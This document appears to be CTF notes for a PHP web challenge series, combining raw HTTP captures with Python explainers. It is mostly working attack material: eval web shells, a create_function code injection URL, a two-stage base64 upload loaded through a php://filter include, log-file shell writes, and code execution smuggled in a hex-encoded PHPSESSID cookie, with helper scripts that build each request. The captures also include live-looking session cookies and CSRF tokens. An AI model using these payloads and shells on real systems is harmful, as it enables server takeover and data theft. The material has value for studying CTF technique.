[codebreaking.tricking.io] 1-4 notes

view-source:http://51.158.75.42:8087/?action=\create_function&arg=};var_dump(glob(%22../*%22));function%20a(){
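Added example, not part of the original notes: a small Python model of what PHP's create_function() does with its two arguments, so the arg= in the URL above can be read as the PHP source it becomes. The template string is the one PHP (up to 7.4; the function is deprecated in 7.2 and gone in 8.0) hands to eval(); the leading backslash in \create_function is just the fully-qualified form of the same global function, which PHP accepts as a string callable. It is assumed here that the challenge calls the named function with an empty parameter list and arg as the body; the notes only show the URL.

```python
# Added example, not from the original notes: models create_function() so the
# injected "arg" above can be read as PHP source. Template from PHP's
# zend_builtin_functions.c; the empty parameter list is an assumption.

def create_function_source(args: str, code: str) -> str:
    """Return the source create_function($args, $code) hands to eval()."""
    return "function __lambda_func(" + args + "){" + code + "}"


def injection(statement: str) -> str:
    """Build an 'arg' that escapes the lambda body: close it with '}', run the
    statement at eval time, then open a dummy function so the template's
    trailing '}' still closes something and the source stays valid PHP."""
    return "};" + statement + "function a(){"


def braces_balanced(src: str) -> bool:
    """Cheap syntax sanity check: no '}' without an open '{', all closed at the end."""
    depth = 0
    for ch in src:
        if ch == "{":
            depth += 1
        elif ch == "}":
            depth -= 1
            if depth < 0:
                return False
    return depth == 0


PAYLOAD = injection('var_dump(glob("../*"));')   # decoded form of the URL's arg=
SOURCE = create_function_source("", PAYLOAD)      # what eval() receives (assumed empty args)

if __name__ == "__main__":
    print(PAYLOAD)
    print(SOURCE)
    print("balanced:", braces_balanced(SOURCE))
```

The var_dump runs when eval() compiles and executes the source, before anyone calls the lambda; the dummy function a() exists only to absorb the closing brace the template appends.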
>>> "<?php @eval($_GET['c']);var_dump(1);?>".encode("base64")
'PD9waHAgQGV2YWwoJF9HRVRbJ2MnXSk7dmFyX2R1bXAoMSk7Pz4=\n'
POST /index.php HTTP/1.1
Host: 127.0.0.1:9090
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.20.1
Content-Length: 192
Content-Type: multipart/form-data; boundary=ac98ccfcbed08b2291999b0ff480d138

--ac98ccfcbed08b2291999b0ff480d138
Content-Disposition: form-data; name="file"; filename="file"

PD9waHAgQGV2YWwoJF9HRVRbJ2MnXSk7dmFyX2R1bXAoMSk7Pz4=
--ac98ccfcbed08b2291999b0ff480d138--

POST /index.php HTTP/1.1
Host: 127.0.0.1:9090
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.20.1
Content-Length: 205
Content-Type: multipart/form-data; boundary=ac98ccfcbed08b2291999b0ff480d138

--ac98ccfcbed08b2291999b0ff480d138
Content-Disposition: form-data; name="file"; filename="file"

<?=
include "php://filter/convert.base64-decode/resource=1.php";
--ac98ccfcbed08b2291999b0ff480d138--

view-source:http://51.158.75.42:8088/data/04445c51df9a9db8c23eab9e201887cf/9.php?c=var_dump(glob(%22../*%22));
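Added example, not from the original notes: rebuilds the two multipart uploads captured above so the two-stage split is explicit and the Content-Length values in the dumps can be checked. As far as the notes show it, the point of the split is that stage 1 (the shell, base64-encoded) contains no PHP tag at all, and stage 2 is a tiny loader that includes stage 1 through the convert.base64-decode stream filter, which turns the stored base64 back into PHP at include time. The boundary, the shell and the 127.0.0.1:9090 target are taken from the captures; the stage-1 file name 1.php is the one the second capture used and is assumed for the usage at the bottom. Nothing is sent.

```python
# Added example, not from the original notes: rebuilds the two multipart
# uploads from the captures above. Boundary and shell come from the dumps;
# the 1.php name is assumed. Builds bytes only, sends nothing.
import base64

BOUNDARY = "ac98ccfcbed08b2291999b0ff480d138"
SHELL = b"<?php @eval($_GET['c']);var_dump(1);?>"


def multipart_body(content: bytes, boundary: str = BOUNDARY,
                   field: str = "file", filename: str = "file") -> bytes:
    """One-file multipart/form-data body, CRLF line endings, no per-part
    Content-Type, matching the python-requests capture above."""
    head = (f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
            "\r\n").encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return head + content + tail


def stage1_payload(php: bytes) -> bytes:
    """Stage 1 content: the shell base64-encoded, so the uploaded bytes hold no PHP tag."""
    return base64.b64encode(php)


def stage2_payload(resource: str) -> bytes:
    """Stage 2 content: a loader that includes stage 1 through the base64-decode
    stream filter. '<?=' is used because it works regardless of short_open_tag."""
    return ("<?=\r\n"
            f'include "php://filter/convert.base64-decode/resource={resource}";').encode()


def post_request(path: str, host: str, body: bytes) -> bytes:
    """Raw HTTP/1.1 POST around a multipart body (header set mirrors the captures)."""
    headers = (f"POST {path} HTTP/1.1\r\n"
               f"Host: {host}\r\n"
               "Connection: close\r\n"
               f"Content-Length: {len(body)}\r\n"
               f"Content-Type: multipart/form-data; boundary={BOUNDARY}\r\n"
               "\r\n")
    return headers.encode() + body


if __name__ == "__main__":
    # Send stage 1, note the name the server stores it under, then send stage 2
    # pointing at that name (1.php in the captures).
    print(post_request("/index.php", "127.0.0.1:9090",
                       multipart_body(stage1_payload(SHELL))).decode())
    print(post_request("/index.php", "127.0.0.1:9090",
                       multipart_body(stage2_payload("1.php"))).decode())
```

The lengths come out at 192 and 205 bytes, the same as the captured Content-Length headers, which confirms the loader in the capture ends its first line with CRLF.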
???
<script language="php">
eval($_POST[only]);
</script>
(the <script language="php"> open tag is PHP 5 only; it was removed in PHP 7.0, so this form is no use against a PHP 7 target)
POST /index.php HTTP/1.1
Host: 123.207.40.26:60000
Content-Length: 105
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://127.0.0.1:9090/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en;q=0.8,zh-CN;q=0.7
Cookie: indent_type=space; space_units=4; keymap=sublime; csrftoken=9Ky4QNPtX829j5rQWdDVHhDwVLTO4XUQkS7nHpl4wAZXrnvB7DhwBcGJjPrB8HEi; sessionid=3abaex90lt9kmrhn0fkyhv95wypznisd
Connection: close

domain=%3c%3f%70%68%70%0a%65%76%61%6c%28%24%5f%47%45%54%5b%63%5d%29%3b%64%69%65%28%29%3b%3f%3e&log=.php/.
// streams.c:1738 (php_stream_locate_url_wrapper): the characters accepted in the scheme in front of "://"
    for (p = path; isalnum((int)*p) || *p == '+' || *p == '-' || *p == '.'; p++) {
        n++;
    }
POST http://php/index.php HTTP/1.1
Host: 127.0.0.1:60000
Content-Length: 114
Cache-Control: max-age=0
Origin: http://127.0.0.1:60000
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://127.0.0.1:60000/
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en;q=0.8,zh-CN;q=0.7
Cookie: indent_type=space; space_units=4; keymap=sublime; csrftoken=9Ky4QNPtX829j5rQWdDVHhDwVLTO4XUQkS7nHpl4wAZXrnvB7DhwBcGJjPrB8HEi; sessionid=gAN9cQAu:1gQKO1:nz0EZkHVizd7Wbp0FMJt-DDiF9o
Connection: close

domain=PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2MnXSk7Pz4.com.&log=://filter/write=convert.base64-decode/resource=index.php/.

$_SERVER['SERVER_NAME'] can be forged by the client (compare the request line POST http://php/index.php HTTP/1.1 above)
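Added example, not from the original notes: a Python model of the two PHP path-handling details the requests above rely on. locate_wrapper() follows the scheme scan quoted from streams.c plus the lookup that follows it in the same function (the match is case-insensitive; an unknown scheme produces the "Unable to find the wrapper" warning and PHP falls back to the plain-file wrapper); the wrapper set is a stand-in for a default build. plain_path() models how the plain-file wrapper folds "." and ".." segments before opening, which is what lets log=.php/. and resource=index.php/. end up as .php files; posixpath.normpath stands in for PHP's own canonicalisation. Both are models for illustration, not PHP's code.

```python
# Added example, not from the original notes: models PHP's scheme scan
# (quoted above from streams.c) and the plain-file path folding behind the
# "/." suffix. KNOWN_WRAPPERS is an assumed default set; normpath stands in
# for PHP's own canonicalisation.
import posixpath
import string

SCHEME_CHARS = set(string.ascii_letters + string.digits + "+-.")        # the for-loop's character class
KNOWN_WRAPPERS = {"file", "php", "http", "https", "ftp", "data", "glob", "phar"}  # assumed


def locate_wrapper(path: str):
    """Return (scheme, rest) for a path PHP hands to a URL wrapper, or
    (None, path) when it falls back to the plain-file wrapper."""
    n = 0
    for ch in path:                      # same scan as the quoted loop
        if ch in SCHEME_CHARS:
            n += 1
        else:
            break
    if n > 1 and path[n:n + 3] == "://":
        scheme, rest = path[:n], path[n + 3:]
    elif n == 4 and path[:5] == "data:":  # the one scheme PHP accepts without "//"
        scheme, rest = path[:4], path[5:]
    else:
        return None, path
    if scheme.lower() not in KNOWN_WRAPPERS:
        # PHP warns 'Unable to find the wrapper "..."' and treats it as a plain file
        return None, path
    return scheme.lower(), rest


def plain_path(path: str) -> str:
    """Path the plain-file wrapper actually opens: '.' and '..' segments are folded,
    so a trailing '/.' survives a string check on the extension but not the open."""
    return posixpath.normpath(path)


def scheme_safe_base64(b64: str) -> bool:
    """Can a base64 blob sit in scheme position? '/' and '=' end the scan, '+' does not."""
    return all(c in SCHEME_CHARS for c in b64)


if __name__ == "__main__":
    # the log= value of the second request, behind a scheme of "php"
    print(locate_wrapper("php://filter/write=convert.base64-decode/resource=index.php/."))
    print(plain_path("index.php/."), plain_path("123.207.40.26.php/."))
    print(scheme_safe_base64("PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2MnXSk7Pz4"))
```

Two consequences worth noting: the base64 in the domain= value has its "=" padding stripped because "=" is outside the scheme character class, and the blob plus ".com." in front of "://" is not a registered wrapper, so whatever puts "php" in front of the log= value has to come from somewhere else (the SERVER_NAME note above).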

GET /?code=var_dump(hex2bin(session_id(session_start()))); HTTP/1.1
Host: 51.158.75.42:8084
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
DNT: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en;q=0.8,zh-CN;q=0.7
Cookie: PHPSESSID=7661725f64756d7028676c6f6228222e2e2f2a2229293b
Connection: close


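Added example, not from the original notes: the client side of the PHPSESSID trick above. valid_session_id() mirrors the rule PHP applies to an incoming session id (php_session_valid_key: only [A-Za-z0-9,-], 1 to 256 characters; anything else is discarded and a fresh id generated), which is why the code has to travel as hex rather than raw. php_to_sid() and sid_to_php() are the two directions of that encoding, and exploit_request() assembles the GET the notes show: the parameter-free call chain goes in ?code=, the real code rides in the cookie. The host and the sink function name are parameters, not facts about the target; var_dump is the sink the capture used.

```python
# Added example, not from the original notes: client side of the PHPSESSID
# trick. Session-id rule mirrors php_session_valid_key(); host and sink are
# parameters, not facts about the target.
import binascii

SID_ALPHABET = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789,-")
SID_MAX_LEN = 256   # PS_MAX_SID_LENGTH


def valid_session_id(sid: str) -> bool:
    """True if PHP would accept sid from the cookie instead of discarding it."""
    return 0 < len(sid) <= SID_MAX_LEN and all(c in SID_ALPHABET for c in sid)


def php_to_sid(code: str) -> str:
    """Hex-encode PHP code into a cookie value that passes valid_session_id().
    Hex doubles the size, so the code is capped at SID_MAX_LEN // 2 bytes."""
    sid = binascii.hexlify(code.encode()).decode()
    if not valid_session_id(sid):
        raise ValueError("payload must be 1..%d bytes" % (SID_MAX_LEN // 2))
    return sid


def sid_to_php(sid: str) -> str:
    """Server-side counterpart: what hex2bin(session_id(session_start())) yields."""
    return binascii.unhexlify(sid).decode()


def exploit_request(code: str, host: str, sink: str = "var_dump") -> str:
    """Raw GET as in the capture: chain of parameter-free calls in ?code=,
    the code itself in the PHPSESSID cookie."""
    chain = f"{sink}(hex2bin(session_id(session_start())));"
    return (f"GET /?code={chain} HTTP/1.1\r\n"
            f"Host: {host}\r\n"
            f"Cookie: PHPSESSID={php_to_sid(code)}\r\n"
            "Connection: close\r\n\r\n")


if __name__ == "__main__":
    print(exploit_request('var_dump(glob("../*"));', "51.158.75.42:8084"))
```

The cookie value produced for var_dump(glob("../*")); is the one in the capture; the 256-character session-id limit means at most 128 bytes of code fit in one cookie this way.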
My name is {'wsgi.errors': <gunicorn.http.wsgi.WSGIErrorsWrapper object at 0xffff9adc7e80>, 'wsgi.version': (1, 0), 'wsgi.multithread': True, 'wsgi.multiprocess': True, 'wsgi.run_once': False, 'wsgi.file_wrapper': <class 'gunicorn.http.wsgi.FileWrapper'>, 'SERVER_SOFTWARE': 'gunicorn/19.9.0', 'wsgi.input': <gunicorn.http.body.Body object at 0xffff9ad82e10>, 'gunicorn.socket': <gevent._socket3.socket object, fd=11, family=2, type=1, proto=6>, 'REQUEST_METHOD': 'GET', 'QUERY_STRING': '', 'RAW_URI': '/', 'SERVER_PROTOCOL': 'HTTP/1.0', 'HTTP_HOST': '51.158.73.123', 'HTTP_X_FORWARDED_PROTO': 'http', 'HTTP_X_FORWARDED_FOR': '219.217.246.194', 'HTTP_CONNECTION': 'close', 'HTTP_CACHE_CONTROL': 'max-age=0', 'HTTP_UPGRADE_INSECURE_REQUESTS': '1', 'HTTP_DNT': '1', 'HTTP_USER_AGENT': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36', 'HTTP_ACCEPT': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'HTTP_REFERER': 'http://51.158.73.123:8083/login/?next=/', 'HTTP_ACCEPT_ENCODING': 'gzip, deflate', 'HTTP_ACCEPT_LANGUAGE': 'zh,en-US;q=0.9,en;q=0.8,zh-CN;q=0.7', 'HTTP_COOKIE': 'thejs.session=s%3AWdR8Pze5g-A8pPL9M1i07I_2s0DnbTDz.oG7bVoS265hR8KzjDZNPHW3ms3cukA7aJiwjhnl41bo; csrftoken=kiKTZQl4VO9vf0yzf1vd0V2SdJmweyzwSaPTCYN7MP6MP1hX85Zg33YVuNKi9clQ; sessionid=.eJxVjLEOgjAUAIuomzHxK3BpoA2ls7v728h7tAhq2pTS0cRPFxMW1rvLffNPYAWcGGMtpnloU7RTO5qQQbYwHXZw2TrC7mWdCTlcF2Ge6B6ed97N00j8n_G1iPzujX3f1n4P5-1owDiEAxQLJUEVyVISqdpSXwmpS1RCV6W0TaOxFrKvlerCMfEfqC00ww:1gQKej:eEilnTramvvogvoJ9kh5gRGZyAc', 'wsgi.url_scheme': 'http', 'REMOTE_ADDR': '172.27.0.3', 'REMOTE_PORT': '53870', 'SERVER_NAME': '0.0.0.0', 'SERVER_PORT': '8000', 'PATH_INFO': '/', 'SCRIPT_NAME': '', 'CSRF_COOKIE': 'kiKTZQl4VO9vf0yzf1vd0V2SdJmweyzwSaPTCYN7MP6MP1hX85Zg33YVuNKi9clQ'}
$ curl -X POST 'http://51.158.73.123:8080/server/editor?action=Catchimage' -d 'source[]=http://img.baidu.com/img/logo-zhidao.gif'
{"state":"SUCCESS","list":[{"url":"\/upload\/image\/b6b51ff26899674cb3aa3fb57783e4dd\/201811\/24\/50aaff118c62275ad57a.gif","source":"http:\/\/img.baidu.com\/img\/logo-zhidao.gif","state":"SUCCESS"}]}
http://51.158.73.123:8080/server/editor?action=Catchimage
$ cat 50aaff118c62275ad57a.gif | curl -F 'upfile=@-' "http://51.158.73.123:8080/server/editor?action=UploadImage"
{"state":"SUCCESS","url":"\/upload\/image\/b6b51ff26899674cb3aa3fb57783e4dd\/201811\/24\/4003f3ad55c4a759f0bd.gif","title":"-","original":"-"}
$ cat index.php | curl -F 'upfile=@-' "http://51.158.73.123:8080/server/editor?action=UploadImage"
{"upfile":["The upfile must be an image.","The upfile must be a file of type: png, jpg, jpeg, gif, bmp."]}